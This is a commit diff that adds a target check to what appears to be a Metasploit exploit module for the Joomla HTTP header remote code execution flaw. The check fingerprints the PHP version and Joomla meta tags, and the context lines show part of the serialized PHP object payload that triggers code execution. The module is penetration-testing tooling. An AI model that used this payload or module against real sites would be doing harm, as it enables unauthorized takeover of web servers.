Add a check for joomla

2015-12-15 11:03:36 -06:00 · 2015-12-15 11:03:36 -06:00 · b9b280954b
parent e4309790f5
commit b9b280954b
1 changed files with 46 additions and 0 deletions
--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@ -49,6 +49,39 @@ class Metasploit3 < Msf::Exploit::Remote
      ], self.class)
  end

+  def check
+    res = send_request_cgi({'uri' => target_uri.path })
+
+    unless res
+      vprint_error("Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless res.headers['X-Powered-By']
+      vprint_error("Unable to determine the PHP version.")
+      return Exploit::CheckCode::Unknown
+    end
+
+    php_version = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)/i).flatten.first || ''
+    vprint_status("Found PHP version: #{php_version}")
+
+    if php_version > '5.3'
+      vprint_error('This module currently does not work against this PHP version')
+      return Exploit::CheckCode::Safe
+    end
+
+    res.get_html_meta_elements.each do |element|
+      if element.attributes['name'] &&
+        /^generator$/i === element.attributes['name'] &&
+        element.attributes['content'] &&
+        /joomla/i === element.attributes['content'].value
+        return Exploit::CheckCode::Detected
+      end
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
  def get_payload
    pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
    middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
@ -58,7 +91,20 @@ class Metasploit3 < Msf::Exploit::Remote
    return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
  end

+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+
  def exploit
+    if check == Exploit::CheckCode::Safe
+      print_error('Target seems safe, so we will not continue.')
+      return
+    end
+
    print_status("Sending payload ...")
    res = send_request_cgi({
      'method'    => 'GET',